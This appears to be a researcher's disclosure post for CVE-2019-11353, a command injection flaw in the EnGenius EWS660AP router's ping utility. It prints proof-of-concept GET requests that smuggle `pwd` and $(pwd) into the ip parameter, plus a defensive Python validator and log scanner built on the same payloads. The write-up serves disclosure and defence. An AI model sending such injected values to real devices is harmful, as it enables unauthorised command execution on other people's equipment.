CVE-2019-11353 – EnGenius EWS660AP Arbitrary Code Execution

Hello, from the other side of the ether!

Just making a quick post to briefly highlight an arbitrary code execution flaw in an EnGenius router. You can find more information regarding this flaw below:

CVE Founder: Max Segura
Vendor: EnGenius
Software: EWS660AP
Version: Firmware 2.0.284
Vulnerability: Arbitrary Code Execution
Reported: 4-03-19
Fix Discovered: 4-15-19 on ticket #12727
National Vulnerability Database: https://nvd.nist.gov/vuln/detail/CVE-2019-11353

Intro

It is important to note that this flaw impacts the version annotated above, but could potentially affect other versions as well, except for the latest version, 3.5.0.11, which is currently available. If you are a business using this type of device, you are encouraged to visit the EnGenius main website at https://www.engeniustech.com/engenius-firmware-updates.html to keep your products up to date.

Remember to test responsibly and only on devices you own 🙂

Proof of Concept

This router supports a myriad of functions and utilities through BusyBox. Two utilities that the router uses are ping and traceroute. These can be abused to run other commands by using backticks (`) or $().

Backticks and $() are enabled features of the router's core operating system shell that allow command substitution: the enclosed command is evaluated and its output is inserted into the surrounding command, so a value that was meant to be an address can carry a command of its own.

Here are some images demonstrating how you can alter the requests sent to the router and then see the output on the page.

GET /cgi-bin/luci/;stok=881c7d2ca114c987a08ea8707aabd826/html/doPing?ip=`pwd`&size=64&num=4&addresstype=ipv4&t=1554749403990 HTTP/1.1

You can also send the following using $():

GET /cgi-bin/luci/;stok=881c7d2ca114c987a08ea8707aabd826/html/doPing?ip=$(pwd)&size=64&num=4&addresstype=ipv4&t=1554749403990 HTTP/1.1

[Screenshots: the modified doPing request carrying pwd, and the pwd output rendered on the page]
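As an added defender-side example (not code from the original post or from EnGenius): a strict allow-list check for the ip parameter, which is the shape of fix a vendor would apply before handing the value to ping or traceroute, and a small scanner that flags requests to the diagnostics endpoints whose ip value fails that check. The log lines are constructed for the example, and the doTraceroute endpoint name is an assumption; only doPing appears in the post.

```python
import ipaddress
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log request lines (not taken from the post): the two
# PoC shapes shown above, a benign ping, and a percent-encoded variant.
SAMPLE_LOG = """\
GET /cgi-bin/luci/;stok=881c7d2ca114c987a08ea8707aabd826/html/doPing?ip=`pwd`&size=64&num=4&addresstype=ipv4 HTTP/1.1
GET /cgi-bin/luci/;stok=881c7d2ca114c987a08ea8707aabd826/html/doPing?ip=$(pwd)&size=64&num=4&addresstype=ipv4 HTTP/1.1
GET /cgi-bin/luci/;stok=881c7d2ca114c987a08ea8707aabd826/html/doPing?ip=192.0.2.10&size=64&num=4&addresstype=ipv4 HTTP/1.1
GET /cgi-bin/luci/;stok=881c7d2ca114c987a08ea8707aabd826/html/doTraceroute?ip=%24%28pwd%29&addresstype=ipv4 HTTP/1.1
"""

# doPing is on the page; doTraceroute is an assumed name for the traceroute handler.
DIAG_ENDPOINTS = ("/html/doPing", "/html/doTraceroute")

# RFC 1123 style hostname: labels of letters, digits and hyphens, joined by dots.
_HOSTNAME = re.compile(
    r"[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(\.[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*"
)


def is_safe_host(value: str) -> bool:
    """Allow-list: accept only an IPv4/IPv6 literal or a plain hostname.

    Anything else (backticks, $(), ;, |, spaces, ...) is rejected outright rather
    than escaped, so no shell metacharacter can ever reach the ping command line.
    """
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        return _HOSTNAME.fullmatch(value) is not None


def flag_requests(log_text: str) -> list:
    """Return (endpoint, ip_value) pairs for diagnostics requests that fail the allow-list."""
    findings = []
    for line in log_text.splitlines():
        parts = line.split(" ")
        if len(parts) < 2:
            continue
        url = urlsplit(parts[1])
        if not url.path.endswith(DIAG_ENDPOINTS):
            continue
        # Decode the query ourselves: a percent-encoded $(...) must be judged
        # on its decoded form, which is what the shell would eventually see.
        for value in parse_qs(url.query, keep_blank_values=True).get("ip", [""]):
            if not is_safe_host(value):
                findings.append((url.path.rsplit("/", 1)[-1], value))
    return findings
```

Running flag_requests over SAMPLE_LOG reports the three crafted requests and leaves the benign 192.0.2.10 ping alone; the same is_safe_host check, applied server-side before the value is handed to BusyBox, is what closes the hole.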

This flaw was fixed in firmware version 3.5.0.11; please be sure to check the link above to upgrade your devices.

Until next time,
Happy Easter!
